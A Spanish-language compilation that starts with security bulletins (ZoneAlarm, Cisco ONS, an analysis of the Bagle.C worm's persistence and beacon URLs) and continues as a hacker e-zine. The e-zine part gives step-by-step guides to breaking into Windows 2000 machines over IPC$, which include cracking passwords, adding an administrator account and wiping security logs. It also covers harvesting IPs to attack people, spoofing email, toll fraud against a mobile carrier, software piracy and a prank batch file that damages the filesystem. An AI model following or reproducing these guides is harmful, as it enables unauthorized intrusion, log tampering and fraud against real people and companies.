Zone Labs recomienda a los usuarios afectados que actualicen su software a la mayor brevedad posible. Las versiones afectadas son la 4.0 o superior de los productos antes mencionados, ya que las anteriores no reproducen el problema. Los productos Integrity Server e Integrity Clientless tampoco se ven afectados por la vulnerabilidad.

  • Para ZoneAlarm, ZoneAlarm Plus y ZoneAlarm Pro: se recomienda actualizar a la versión 4.5.538.001. Para realizar este proceso, siga los siguientes pasos:

    1. Seleccionar Overview -> Preferences
    2. En el área de Check for Updates, elegir el tipo de actualización:

      • a. Automatica: el programa notifica automáticamente cuando hay una actualización disponible.
      • b. Manual: usted mismo comprueba la barra de estados para decidir sobre la actualización. Para provocar una comprobación de forma inmediata, pulse 'Check for Update'.

  • Para Integrity 4.0: se recomienda actualizar el cliente a la versión 4.0.146.046.
  • Para Integrity 4.5: se recomienda actualizar el cliente a la versión 4.5.085

*Acceso no autorizado y denegación de servicio en dispositivos ONS de Cisco

Se han descubierto diversas vulnerabilidades en los dispositivos ONS 15327, 15454, 15454 SDH y 15600 de Cisco. Un usuario remoto puede subir información a la tarjeta controladora o reiniciarla.

Se ha descubierto que un usuario remoto puede conectarse al servicio TFTP en el puerto 69 de UPD y ejecutar comandos GET y PUT. Se podría así descargar los archivos de sistema en el TCC activo en los directorios /flash0 o /flash1. Se podría provocar una denegación de servicio subiendo archivos de sistema ONS corruptos a la tarjeta controladora.

Cisco ha asignado a esta vulnerabilidad el identificador CSCec17308 para los dispositivos ONS 15327, ONS 15454 y ONS 15454 SDH mientras que el identificador es el CSCec19124 para el ONS 15600.

Se ha descubierto también que un usuario remoto puede conectar con el puerto TCP 1080 y evitar enviar el último ACK de la comunicación para provocar una denegación de servicio en los dispositivos ONS 15327, ONS 15454 y ONS 15454 SDH, ya que provocará la reinicialización de dichos dispositivos. En los ONS 15454, ONS 15327, y ONS 15454 SDH, el trafico caerá temporalmente de los canales de datos síncronos mientras las tarjetas de control activa y en espera están reiniciandose.

También se ha detectado que un usuario remoto puede conectarse al puerto telnet y acceder a la cuenta de superusuario que ha sido bloqueada, desactivada o suspendida con sólo usar la clave previamente configurada para la cuenta.

La compañía ha informado que los dispositivos ONS series 15800, ONS series 15500 Extended Service Platform, ONS 15302, ONS 15305, ONS series 15200 metro DWDM systems, y ONS series 15190 no están afectados por este problema. También informa que los ONS 15327 funcionando con el ONS Release 1.x(x) y 3.x(x), y los ONS 15454 con ONS Releases 2.x(x) y 3.x(x) tampoco están afectados.

Los Cisco ONS Release 4.6(0) no se ven afectados por estas vulnerabilidades, pero el fabricante recomienda actualizar al Release 4.6(1).

Los procedimientos de actualización para los ONS 15327, 15454 y 15600 están disponibles en las siguientes URLs (respectivamente):
<http://www.cisco.com/univercd/cc/td/doc/product/ong/15327/327doc41/index.htm>
<http://www.cisco.com/univercd/cc/td/doc/product/ong/15400/r46docs/index.htm>
<http://cisco.com/univercd/cc/td/doc/product/ong/15600/index.htm>


*Bagle.C, nueva variante del gusano comienza su propagación

A última hora del viernes 27 hemos podido detectar en Hispasec la propagación por e-mail de la que sería la tercera variante del gusano Bagle, que nos ha llegado en un correo electrónico como archivo adjunto .ZIP de unos 16KB. Bagle.C, que ha sido programado para que cese su propagación después del día 14 de marzo de 2004, abre en los sistemas infectados una puerta trasera en el puerto TCP 2475 que podría permitir a un atacante controlar el equipo de forma remota.

Aunque aun es pronto para conocer indicadores de propagación e infección, algunas casas antivirus ya lo sitúan como alerta de nivel medio por su potencial y/o basándose en los ratios conseguidos por sus predecesores. En una próxima entrega podremos ofrecer la tabla completa de los tiempos de reacción de las diferentes casas antivirus en proporcionar la actualización para Bagle.C a sus clientes, según el sistema de monitorización 24hx7d del laboratorio de Hispasec.


Así llega Bagle.C

El e-mail en el que Bagle.C se adjunta nos llega con la dirección de remite falseada, con el cuerpo del mensaje vacío, sin ningún texto, y el asunto en inglés puede ser uno de los siguientes:

Accounts department
Ahtung!
Camila
Daily activity report
Flayers among us
Freedom for everyone
From Hair-cutter
From me
Greet the day
Hardware devices price-list
Hello my friend
Hi!
Jenny
Jessica
Looking for the report
Maria
Melissa
Monthly incomings summary
New Price-list
Price
Price list
Pricelist
Price-list
Proclivity to servitude
Registration confirmation
The account
The employee
The summary
USA government abolishes the capital punishment
Weekly activity report
Well...
You are dismissed
You really love me? he he

El archivo adjunto, donde viaja Bable.C, tiene un nombre variable formado con caracteres al azar y extensión .ZIP, y su tamaño es de unos 16KB. En su interior se encuentra un ejecutable .EXE comprimido con UPX de 15.872 bytes, que si lo visualizamos desde el explorador de Windows aparecerá con el icono de las hojas de cálculo Excel, en un intento más de engañar al usuario.


La infección del sistema

Cuando se ejecuta el gusano, en primer lugar abre el bloc de notas de Windows con una hoja en blanco, si bien de forma oculta al usuario comienza la infección del sistema, copiando en el directorio de sistema de Windows (por ejemplo WINNT\SYSTEM) los siguientes archivos:

readme.exe 
onde.exe 
doc.exe 
readme.exeopen

A continuación introduce la siguiente entrada en el registro de Windows para asegurarse su ejecución en cada inicio de sistema:

HKEY_CURRENT_USER\Software\Microsoft\Windows\ 
CurrentVersion\Run "gouday.exe" = %System%\readme.exe

Adicionalmente añade las siguientes entradas, que incluye el puerto donde abre la puerta trasera y un identificador del sistema infectado:

HKEY_CURRENT_USER\Software\DateTime2 "frun" 
HKEY_CURRENT_USER\Software\DateTime2 "uid" 
HKEY_CURRENT_USER\Software\DateTime2 "port"

Propagación

Bagle.C incorpora su propio motor SMTP para enviarse a otros sistemas, y recopila las direcciones de correo electrónico del ordenador infectado buscando en los archivos con extensión .ADB, .ASP, .CFG, .DBX, .EML, .HTM, .HTML, .MDX, .MMF, .NCH, .ODS, .PHP, .PL, .SHT, .TXT, .WAB.

El gusano evita enviarse a las direcciones que contenga algunas de las siguientes cadenas:

.ch 
@avp. 
@hotmail.com 
@microsoft 
@msn.com 
local 
noreply 
postmaster@ 
root@

Evitando ser detectado

Bagle.C intenta evitar ser detectado, desactivando varios programas de seguridad, como antivirus, firewalls o sistemas de actualización. Para ello intenta finalizar los siguientes procesos si se encuentran en la memoria del sistema infectado:

  • NUPGRADE.EXE
  • ATUPDATER.EXE
  • AUPDATE.EXE
  • AUTOTRACE.EXE
  • AUTOUPDATE.EXE
  • AVLTMAIN.EXE
  • MCUPDATE.EXE
  • AVPUPD.EXE
  • AVWUPD32.EXE
  • AVXQUAR.EXE
  • CFIAUDIT.EXE
  • DRWEBUPW.EXE
  • ICSSUPPNT.EXE
  • AUTODOWN.EXE
  • ICSUPP95.EXE
  • LUALL.EXE
  • OUTPOST.EXE
  • UPDATE.EXE

Puerta trasera

Bagle.C abre en los sistemas infectados una puerta trasera en el puerto TCP 2745, que permitiría a un atacante externo subir y ejecutar programas, de forma que puede controlar el sistema de forma remota.

Parece ser que el creador del gusano ha intentado utilizar un sistema de notificación para conocer las direcciones IPs de los sistemas infectados y así intentar utilizar esta puerta trasera. Se basa en que el gusano realiza peticiones GET a las siguientes direcciones:

<http://permail.uni-muenster.de/scr.php>
<http://www.songtext.net/de/scr.php>
<http://www.sportscheck.de/scr.php>

Como parámetros pasa el puerto TCP abierto, el número "uid" que almacena en una de las entradas del registro, y también quedaría registrado en esos scripts la dirección IP desde la cual se realiza la petición, datos más que suficientes para que el creador del gusano intente utilizar la puerta trasera para todo tipo de fines.


Con fecha de caducidad en su rutina de propagación

Bagle.C ha sido programado para que cese su rutina de propagación a partir del 14 de marzo, si bien la puerta trasera de los sistemas infectados seguirá abierta mientras que no se elimine el gusano de los equipos infectados.

Recordemos que su anterior variante, Bagle.B, dejó de propagarse el 25 de febrero, y apenas dos días después ha dado comienzo la distribución de Bagle.C.


Prevención

Como siempre la regla de oro a seguir es no abrir o ejecutar archivos potencialmente peligrosos, sobre todo si no hemos demandado su envío. Adicionalmente, contar con soluciones antivirus correctamente instaladas y puntualmente actualizadas. También resulta útil seguir los foros de seguridad o listas como "una-al-día", para estar al tanto de las últimas amenazas que nos pueden afectar.

COMPILADO

el-guru

Estos son textos compilados que en algun día, no recuerdo cuando :P, me mando mi amigo el-guru.
Lo bueno viene en envase chicho XD

Intro a Proxys

Un Proxy es una forma de engañar a servidor ya que los Proxy sirven para proteger la identidad de tu maquina, el servidor cree que te estas conectando desde el Proxy en vez de tu propio ordenador.

NOTA: Los proxys para conectar a una red en mIRC son llamados Socks

Shell

Bueno una cuenta Shell para aquellos que no saben es una cuenta en una maquina con algún tipo de UNIX a la que se le pueden conectar usuarios remotamente mediante Internet, algunas de las paginas donde se dan este tipo de cuentas gratis son en:
http://www.cyberspace.org ó en http://sdf.lonestar.org

Si conectas directamente desde Telnet las direcciones que deberías de usar son cyberspace.org y sdf.lonestar.org por el puerto 23 como siempre.

Bueno con una cuenta Shell puedes hacer infinidad de cosas eso claro que te lo dejo a tu imaginación y ademas cada cosa que hagas no quedará registrada tu IP si no la de la maquina de la cuenta Shell xD~

Seguridad en Windos

Siempre tienes que recordar que teniendo el S.O. Windows tu maquina nunca estará protegida a un 100% entonces para proteger tu ordenador de Windows hay que tener unos programas llamados "FireWalls" que en español lo tradujeron como "Corta Fuegos"

A grandes rasgos podríamos decir que un Firewall es un programa de seguridad que crea una pared para evitar intrusos en nuestro ordenador y tanto en la red local como en la red externa (Internet).

Te doy algunas de las webs donde podras encontrarlos:

Zone Alarm - http://www.zonelabs.com Muy bueno(lo uso)
Tiny personal Firewall - http://www.tinysoftware.com Bueno
Sygate Personal Firewall - http://www.sygate.com Bueno
Black Ice - http://www.blackice.com Exelente...

Nota: Cuando los bajes por tiempo limitado dirigete a Altavista para buscar un KeyGen para que salga gratis (jejeje a que pinche ratero xD~)


Arte de las IP's

Bueno como todos sabemos al tener una IP algunas veces (al ataque que tenemos en mente) tenemos un 30% de la situación solucionada y ahora te dire como sacarlas en chat, etc...

IRC:
Uno de los casos mas difíciles es como Obtener una IP es por el IRC, por ejemplo: algunas veces cuando empiezas en esto del Hacking la mayoría de los programas para joder (nukes) necesitan el número IP

Pues bien en aquellas redes "pobres" donde no te dan una IP vitual es donde es mas fácil atacar solo tienes que poner este comando en el status: /dsn nick y saldrá la IP de la persona.

Cuando hay servidores donde te dan una IP virtual ó las encriptan (disfrazan tu IP para no ser descubierta) solo hay una forma de averiguar la IP es mandándole un fichero por DCC y mientras se este enviando habres una ventana de MS-DOS y pondrás lo siguiente: NETSTAT -A y ahí saldrá la IP de la personaa la que le mandas el fichero.

Bueno una de las dudas que mas hay es: cuando pongo en MS-DOS el comando NETSTAT -A salen muchas IPs ¿como se cual es? bueno le mejor es que antes de enviar el archivo por DCC habrás MS-DOS y pongas NETSTAT -A y veas las IPs que te aparecen y después sin ningún problema al ejecutar de nuevo NETSTAT -A

NOTA: Lo mejor es que cuando hagas eso cierres todas las ventanas del Internet Explorer y también programas de intercambio de archivos como WINMX, Kazaa, eDonkey... (programas de intercambio)

E-MAIL:

Si te ha llegado un E-mail y te ha enojado tanto que quieres romperle los huebos a patadas al que te lo mando, pues hay una forma de sacar su IP (tu sabes lo que harás con ella) los único que tienes que hacer es: botón derecho sobre el texto ó mensaje y después escoges la opción de PROPIEDADES, te aparecerá un ventana que contiene General y Detalles y tienes que escoger Detalles.

Saldrán enseguida sus datos de la persona:
Received from: [200.56.120.130] by aol net mx
NOTA: La IP salió ya, es así de fácil!!! es: ===>200.53.64.3<===

MSN Messenger de Mierdasoft:

Esta forma de sacar un IP por el MSN Messenger es muy parecida a la forma de sacarla a través del un Chat solo tienes que mandarle un fichero a la persona por medio del Messenger en la opción:

MANDAR FICHERO cuando se este enviando el archivo habré un ventana de MS-DOS y pon el comando NETSTAT -A ahí aparecerá su IP

NOTA: Incluso verciones nuevas permiten esto, la forma que estoy enseñando es la manual, pero en verdad ya hay programas para ello.

IP DE UN DOMINIO:

Pues bien un Dominio es un nombre designado a una IP por ejemplo: www.google.com ó www.terra.com.mx

Para averiguar la IP necesitamos utilizar el comando Ping, habrimos un ventana de MS-DOS y después escribimos ping -a www.google.com y nos aparecerán unos números como puedes ver la IP aparece enseguida del Dominio.

Hack para Novatos

Este es un pequeño repaso a los métodos usados en el Hacking y el cracking para novatos y newbies.

CABALLOS DE TROYA

Consiste en introducir dentro de un programa una rutina o conjunto de instrucciones, por supuesto no autorizadas y que la persona que lo ejecuta no conoce, para que dicho programa actua de una forma diferente a como estaba previsto (Por ejemplo: Formatear el disco duro, modificar un fichero, sacar un mensaje, etc.)


SUPERZAPPING

Se denomina superzapping al uso no autorizado de un programa editor de ficheros para alterar, borrar, copiar, insertar o utilizar en cualquier forma no permitida los datos almacenados en los soportes de un ordenador. El nombre proviene de una utilidad llamada SUPERZAP diseñada para Mainframes y que permite acceder a cualquier parte del ordenador y modificarlo, su equivalente en un PC serian las Pctools o el Norton Disk Editor.


PUERTAS FALSAS

Es una practica acostumbrada en el desarrollo de aplicaciones complejas que los programadores introduzcan interrupciones en la lógica de los programas para chequear la ejecución, producir salidas de control, etc. con objeto de producir un atajo para ir corrigiendo los posibles errores. Lo que ocurre es que en la mayoría de los casos cuando el programa se entrega al usuario estas rutinas no se eliminan del programa y proveen al hacker de accesos o facilidades en su labor si sabe descubrirlas.


BOMBAS LOGICAS

Este suele ser el procedimiento de sabotaje mas comúnmente utilizado por empleados descontentos. Consiste en introducir un programa o rutina que en una fecha determinada destruir o modificara la información, o provocara el cuelgue del sistema.


ATAQUES ASINCRONICOS

Este es quizá el procedimiento mas complicado y del que menos casos se a tenido conocimiento. Se basa en las características de los grandes sistema informáticos para recuperarse de las caídas, para ello periódicamente se graban los datos como volcado de memoria, valor de los registros, etc. de una forma periódica Si alguien consiguiera hacer caer el sistema y modificar dichos ficheros en el momento en que se ponga de nuevo el funcionamiento del sistema este continuara con la información facilitada y por tanto la información podría ser modificada o cuando menos provocar errores.


INGENIERIA SOCIAL

Básicamente convencer a la gente de que haga lo que en realidad no debería. Por ejemplo llamar a un usuario haciéndose pasar por administrador del sistema y requerirle la password con alguna excusa convincente.


SIMULACION DE IDENTIDAD

Básicamente en usar un terminal de un sistema en nombre de otro usuario bien por que se conoce su clave, por que abandono el terminal pero no lo desconecto y ocupamos su lugar. El termino también es aplicable al uso de Tarjetas de Crédito o documentos falsos a nombre de otra persona.


PINCHADO DE LINEAS DE DATOS O SPOOFING

Similar al pinchado de líneas telefónicas, en este caso el objetivo son los sistemas de transmisión de datos (Cable telefónico usado por módem, cableado de una red local, fibra óptica, TV por cable) con el fin de monitorizar la información que pasa por ese punto y obtener información del sistema.


SIMULACION POR ORDENADOR

Se define así el uso de la computadora para simular previamente una situación y de esta forma determinar las acciones a probar. En el contexto del Hacking se refiere a la simulación en la computadora propia del sistema a atacar con el fin de elaborar estrategias de acción.


Intro a FTP

Bueno para que sepas desde el principio que es el FTP te daré el significado en su abreviatura que es: File Transfer Protocol o sea Protocolo de Transferencia de Ficheros y como podrás observar en el listado de los puertos al FTP le corresponde el 21. Este servicio hay que conocerlo muy bien ya que además que nos sirve para subir o bajar ficheros también nos puede ayuda en nuestros propósitos maliciosos, por supuesto el Hacking.

Sino dispones de ningún cliente FTP, el propio Windows lleva incorporado uno, el único problema es que no es muy vistoso ya que funciona en modo MS-DOS pero es muy versátil y perfecto para nosotros. Para ejecutarlo basta que activemos una ventana MS-DOS y en la línea de comandos escribamos FTP y se pondrá en modo FTP. Un ejemplo seria esto:

ftp: connect <- Escribimos FTP. 
ftp> <- activado el modo FTP

Si no sabes manejarlo, escribiendo un "?" o "help" saldrán todos los comandos disponibles del FTP, como quieres saber para que sirve solo vuelve a leer su nombre y ahí te dice todo, en verdad es una forma de subir tus archivos o bajarlos de un server y también es muy útil cuando estas haciendo una Web en sitios como Geocities, Galeón, Miarroba, etc...

Modificar Windows 95, 98, Me

Esta técnica no es que sea propia del Hacking ya que solo sirve para cambiar la pantalla de inicio o la de finalizar windows. Los logos de Windows tienen un formato BMP 320X400 pero están camuflados en ficheros con extensión SYS pero siguen siendo realmente BMP'S.

El logo del principio de Windows (ya sabes el de las nubes) lo podéisencontrar como:

c:\>logo.sys

Si no encuentras este fichero, entonces lo que tenemos que hacer es crearlo y grabarlo allí mismo y cuando Windows vuelva a reiniciar usara nuestro gráfico y si lo volvemos a quitar, usara el de siempre. El logo del final (cuando cierra Windows) esta en el directorio Windows y lo podemos encontrar como:

c:\Windows>logos.sys

Lógicamente es obligatorio que los gráficos que queramos sustituir tengan de tamaño 320x400 y sean ficheros BMP'S. Conviene que les pongamos el atributo de ocultos, que esto se hace con el comando Attrib, por ejemplo:

c:\windows>attrib +h logos.sys <- lo oculta. 
c:\windows>attrib -h logos.sys <- lo hace visible.

Clonar Mail

Clonacion de E-Mails.

Esta tecnica nos ayuda a clonar E-mails que en lo personal solo lo uso para bromear (jejeje), pero puedes usarlo para una verdadera y original Ingenieria Social.

Lo primero que tenemos que hacer es conseguir un E-mail anonimo en www.elhacker.net (buena web), ahi tendremos muchos E-mails anonimos pero te recomiendo el Xmas2000 aunque es un programa viejo... es muy efectivo es un E-MailBomber y un E-mail anonimo en 1 (gran tecnologia jajaja) , despues mira las intrucciones y sigue las clasicas: FROM, TO, MAIL, etc...

Los SMTP en lista son:

HOTMAIL: mail.hotmail.com
YAHOO: smtp.mail.yahoo.com
MSN HOTMAIL (los que son algunwey@msn.com): smtp.email.msn.com
MICROSOFT: mail5.microsoft.com
GEOCITIES: mail.bluelight.com
PARADIZE: smtp.paradise.net.nz


Movi Star Pendejos!!!

De este texto sobre Phreak en verdad no me hago nadita responsable xD~~~

Movi Star maneja una encriptacion de tarjetas dificil de desencriptarlo pero tienen un error de lo mas estupido que cuando hablas no hace la llamada y te manda a una contestadora que dice que tu pinche credito se acabo...

Pues a que si tienes un celular pegaso o Movi Star y con tarjeta y ya no tienes ni $1 peso de crédito lo puedes solucionar.... pos.... compra otra maldita targeta babosooooo!!! jajajaja hay el-guru siempre tan chistosito xDDDDDD~~~

Bueno ahi va llamada gratiss!!! jejeje: (a que pinche guru tan tranza)

  • A) Llama al numero que quieras llamar
  • B) Cuando la grabacion entre... cuelga rápido
  • C) Dale llamar (send) de nuevo para que vuelva a llamar al ultimo número
  • D) Cuando la grabacion entre... presionas el #2, con esto se brinca un password que es el que genera base de datos interna de Movi Star y listo llamada gratisss...

Este bug (error) se debe a los pendejos de los Programadores jeje!!! que parece que no fueron a la escuela los weyes, pero bueno Disfruta tu credito jajajajajajaja!!! (el ingenio del mexicano sobre todas las cosas)


Esperamos que cuando leas esto el Bug siga vigente y si te agarran es tu pedo manito =D.

FALLO EN WIN ME

AliretH_K

Este error lo descubri en mi asqueroso Windows ME que tengo en mi casa (si, me da verguenza tenerlo) y ahora estoy plagado de estos archivitos y lo peor que mi PC no va para ningún lado, a continuación les presento el texto que he escrito sobre esto.

Windows ME, con un simple nombre, trae muchos problemas.

Una vez mas nuestro gran Windows, posee un error.
Este error, es un muy simple de ocasionarlo nosotros mismos, pero es tan molesto, como para no dejar defragmentar nustro ordenador, o dejar correr el ScanDisk ya que este, leera un error, y se reiniciara todas las veces, sin nunca terminar el proceso.
Esto no solo pasa con los programas de Windows (Defrag de Windows, o el ScanDisk del mismo) si no que tambíen este problema, afecta a los usuarios de Norton-SystemWorks al no dejar usar algunos programas de este mismo. Este simple error que se genera, al crear un archivo en el editor de Ms-dos, y guardarlo con el nombre

±_≥_•fi¿π

no importa su extención, este simple archivo, te generará un error de escritura en el disco, que te imposibilitara lo que dije anteriormente.
El Windows no lee este archivo, pero sabe que existe.
No le podras cambiar en nombre, eliminarlo, moverlo, o modificar sus propiedades, aunque puedes modificarle su contenido por cualquiera que sea.
El problema de este archivo, lo ocasiona su nombre ya que posee carácteres no válidos dentro de Windows ME.

±_≥_•fi¿π

Hasta el momento no he encontrado forma alguna de eliminarlo ni de moverlo.
Tampoco este archivo puede ser tratado, al entrar en modo prueba de fallos de Windows, ya que reacciona de la misma manera.
O sea, que si le queremos jugar una mala pasada a alguna persona, podemos crear un .BAT con estos comandos, ya que creará un archivo con el nombre dañino.

@echo off 

 

echo       _____________________________________________________________ 
echo       _                                                           _ 
echo       _                     AliretH_K Hacking                     _ 
echo       _                       de Argentina                        _ 
echo       _-----------------------------------------------------------_ 
echo       _                                                           _ 
echo       _                       Feliz Año nuevo                     _ 
echo       _                                                           _ 
echo       _____________________________________________________________ 

 
Copy c:\ > ±_≥_•fi¿π 

exit

Este .BAT le creará el archivo, con el nombre NO VALIDO y le ocasionará lo que dijimos anteriormente.


<-No Intentes $uperar a los demá$, $superate a ti MismO->

AliretH_K


Bueno, ahora conocen la verdad :P

Hacking de Sistemas Windows 2000 a través de IPC

DonGato

TEMARIO

  1. Buscando Sistemas Win2k.
  2. Conectando a través de IPC$.
  3. Conectando y usando Administración de equipos.
  4. Deshabilitar NTLM
  5. Iniciando el Servidor Telnet.
  6. Creando una cuenta y agregando al grupo de administradores.
  7. Cubriendo tus actos.
  8. Como protegerte de este ataque.

Herramientas que necesitaras: Superscan versión 3.00
by Foundstone (246kb).
Disponibles en descargas.
NetBrute Scanner 1.0.0.7 (247KB).
Disponible en descargas.
PQWak V1.0 (24KB).

  1. BUSCANDO SISTEMAS WIN2k.

    • A. Habré SuperScan.
    • B. Selecciona un rango de IP's.
    • C. Verifica " Only scan responsive pings ( solo busca respuesta a ping)".
    • D. Solo busca en los puertos 139 (NetBios) y 1025 ( Blackjack en red).
    • E. Cuando un sistema responda a cualquiera de los puertos 139,1025 habré NetBrute y verifica si es accesible me diente IPC$.

  2. CONECTANDO A TRAVEZ DE IPC$

    • A. Abre un ventana de DOS.
    • B. Escribe " net use \\ipaddress\ipc$ "" /user:administrator "
    • C. Si te pudiste conectar dirá, " The command was completed successfully " EL comando se ha completado satisfactoriamente.
    • D. Si dice, &#8220;bad username or password&#8221;, Corre PQWak.exe para romper el password. Entonces quedara algo así; net use \\ipaddress\ipc$ "password" /user:administrator
    • E. Usualmente los usuarios tiene un solo password para todo. Trata de conectate a c$.

  3. CONECTANDOSE Y USADNO EL ADMINISTRADOR DE EQUIPOS (se encuentra en el panel de control herramientas administrativas)

    • A. Abrir el administrador de equipos.
    • B. En el Menú&#8220;Action&#8221;, dar &#8220;Conectar a otra computadora &#8221;
    • C. Dar la IP.

  4. DESABILITAR NTLM

    • A. Abrir &#8220;regedit&#8221;
    • B. E n Menú archivo Conectar a registro de red y abrir: HKEY_LOCAL_MACHINE--Software--Microsoft--Telnet Server--1.0&#8212;->NTLM
    • C. Cambiar el valor (2) a (1)
    • D. Esto permitirá que este disponible el login a través de telnet con conexiones IPC$ o dominios confiables.

  5. INICIANDO EL SERVIDOR TELENET.

    • A. En el administrador de equipos abrir Servicios y aplicaciones.
    • B. En Servicios.
    • C. Click derecho en Telnet y abrir propiedades.
    • D. Aplicar servicio Automático he iniciar servicio.

  6. CREANDO UN CUENTA Y AGREGANDOLA A UN GRUPO.

    • A. Abrir una ventana MSDOS escribir : telnet IPaddress
    • B. En la ventana dar el usuarios y el pass.Administrator ( administrador) con no password. o en otro caso el password que obtuvimos con PQWak.
    • C. Para crear una cuenta teclear: net user username password /add
    • D. remplazar &#8220;Username&#8221; and &#8220;password&#8221; con el que queramos.
    • E. Para agregar la cuenta al dominio: net localgroup administrators username /add o net group administrators username /add

  7. CUBRIENDO TUS ACCIONES.

    • A. En una ventana de MSDOS da: net use \\ipaddress\ipc$ /delete
    • B. Antes de deslogearte de el administrador de Equipo. Checa el Security Logs y limpiarlo. :-)

  8. Como proteger tu sistema de este ataque.

    • A. Abre Regedit
    • B. Haz lo siguiente::
    • C. HKEY_LOCAL_MACHINE--System--CurrentControlSet--Control--Lsa-->restrictanonymous
    • D. Cambia el valor de 0 a 1.debe decir 0x00000001(1)
    • E. Esto hace deshabilitar el login atrae de IPC$.
    • F. Siempre útiliza password complicados para la cuenta de administrador.
    • G. Instala el firewall. <http://www.zonealarm.com/>

Carpetas autoejecutables en Windows XP

DonGato

La gente de malware publicó el 01-01-2004 bajo el asunto "Self-Executing HTML: Internet Explorer 5.5 and 6.0 Part IV" un artículo en el que demostraba cómo, creando un archivo .html cuyo código apunta hacia un ejecutable contenido en el propio archivo .html, es posible hacer correr un ejecutable (.exe) cuando la víctima abre el archivo con el Internet Explorer.

La novedad es que, ellos mismos, acaban de publicar, bajo el asunto "Self-Executing FOLDERS: Windows XP Explorer Part V" un texto en el que se advierte de que el mismo archivo, renombrado con la extensión .folder, tomará el icono de una carpeta, pero al ser abierto, se ejecutará mediante el Internet Explorer, causando el resultado buscado, es decir, ejecutar un .exe desde lo que parece ser una carpeta.

En realidad, no existe ningún hallazgo entre el primer articulo y el segundo.
En ambos casos el archivo debe ser ejecutado localmente, bajo la zona de seguridad "Mi PC", es decir, no puede ser utilizado desde internet.
La extensión .folder está documentada y es nueva en Windows XP.
El hecho de que a pesar de la extensión, el archivo sea abierto por el Internet Explorer, es normal, y se debe a que el Explorer trata de encontrar la aplicación adecuada para abrir el archivo comparando el principio del código del archivo con una lista predeterminada, por lo tanto al encontrar que el código es html, es el Internet Explorer el que se encarga de abrirlo.

De todos modos, para los que estén preocupados por esto, podemos reconocer una carpeta maliciosa porque siempre debe llevar la extensión .folder, desconfía si te mandan una carpeta con esta extensión.
Para ésto debes tener configurado tu XP para que se vean todas las extensiones, es decir:
Herramientas

  • Opciones de carpeta
  • Ver
  • Desmarcar "Ocultar extensiones de archivo para tipos de archivo conocidos"

TRUCOS WIN 98

E.I

En windows 98 existe una utilidad denominada "Windows Update" se encuentra en el menú de inicio y sirve para que puedas actualizar tu sistema con los ultimos drivers, parches, etc.

Para que puedas hacer esto sin que estes registrado, ahi van los cambios para el registro del sistema.

REGEDIT4 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion] 
"RegDone"="1" 
"[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Welcome\RegWiz] 
"@"="1"

*Como crear un evento de sonido.

Utilizando el Editor de Registro podremos crear un evento en el sistema y asociarle un sonido.

Ejecutamos la aplicacion "Regedit.exe" desde Inicio/Ejecutar. Entramos en la clave HKEY_CURRENT_USER/AppEvents/Schemes/Apps Suponiendo que vamos a crear un evento con Word poniendole un sonido al Iniciarse.

Seleccionar la clave Apps, pulsamos con el boton derecho sobre la misma, escogiendo a continuacion Nueva Clave, a esta clave le daremos el nombre de Winword. Que es el nombre del ejecutable pero sin extension ni path.
Despues nos iremos al panel derecho y pulsaremos con el boton derecho sobre la clave predeterminado, poniendo el nombre descriptivo que nos parezca "Word".
Situaremos el cursor Winword y pulsaremos boton derecho del raton para añadir una nueva clave, a esta clave hay que darle el nombre de uno de los eventos del sistema, que se encuentran en la carpeta Default que esta un poco mas arriba.
Le daremos el nombre de Open.

Hecho esto iremos a sonidos en el panel de control y asignaremos al evento creado el sonido que mas nos guste.
A partir de ahora cuando entremos en Word oiremos el sonido.

*Pon Iconos a tus disquetes.

Si quieres poner algun el icono que desees a tus disquetes, haz lo siguiente:

Copia tu icono en el disco a: ej:mi_icono.ico
Crea un fichero llamado Autorun.inf y escribe en el las siguientes lineas.

[autorun] 
icon=mi_icono.ico

Abre con el editor de registro "Regedit" la rama suiguiente

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Pon aqui el valor de NoDriveTypeAutoRun=91 00 00 00
A partir del nuevo arranque ya tendras un icono diferente en cada disco personalizado.


*Autopreviewing

Cuando en una ventana pasamos el cursor por ficheros AVI, WAV, estos nos deben aparecer en la parte inferior izquierda de la ventana una "preview" del fichero y asi poder ejecutar la música o el vídeo.
Esta funcionalidad, se la he denominado "autopreviewing", la cual ha sido deshabilitada en la versión final.

Para volverla a habilitar hay que abrir un fichero llamado FOLDER.HTT que esta en la carpeta c:\windows\web y modifar un linea.

Quitarle el atributo de oculto ejecutando la siguiente orden:

- attrib c:\windows\web\folder.htt -h

Editarlo (con edit o notepad) y buscar la frase:

- var wantmedia = false

y cambiarla por

- var wantmedia = true

Volver a poner el atributo de oculto con:

- attrib c:\windows\web\folder.htt +h

*Salir de Windows con un Acceso directo

Para salir de Windows crea un acceso directo con la siguiente línea de comandos:

C:\WINDOWS\RUNDLL32.EXE user.exe,ExitWindows

*Como hacer que el ordenador se apague por si solo.

Para poder hacer este truco debes tener una placa y una fuente de alimentacion un poco especiales, de las que no tienes que darle a ningun boton cuando sale el mersaje "Ahora puedes apagar".

Entrar en Inicio/Programas/Accesorios/Herramientas del sistema/Tareas Programadas Agragar tarea programada, pulsa Siguiente, Examinar y pon como nombre de archivo esta linea

C:\WINDOWS\RUNDLL32.EXE user.exe,ExitWindows

Una vez creada la tarea, ir a propiedades a la solapa de programas y en la ventana "Programar Tarea" elegir la opcion -Cuando este Inactivo-.
Poner el tiempo que tardará en ejecutarse la tarea.
Transcurrido este tiempo de inactividad el ordenador se apagara solo.


*Mira tu configuracion TCP/IP sobre Internet, DNS, Proxy, etc.

Para poder ver todo esto solo tienes que ejecutar teclear desde el menu inicio la aplicacion "winipcfg".


Acelera tu acceso a Internet.

Todos hemos oido hablar de esos famosos paquetes (shareware o freeware), que aceleran la conexión a Internet. Al menos eso dicen. Aceleran, dependiendo de quien o como sea nuestro proveedor de Internet.

Me explico. El tamaño ideal del paquete IP, es aquel en el que el cliente y el servicio están sincronizados. Nuestro servidor, cuando estamos en Internet, es nuestro proveerdor de servicios.
Si nuestro proveedor tiene una maquina Unix, probablemente, su tamaño de paquete sea "pequeño" (del orden de 500 bytes).
En cambio si nuestro proveedor tiene un NT, su paquete será "grande" (del orden de 4 Kbs).
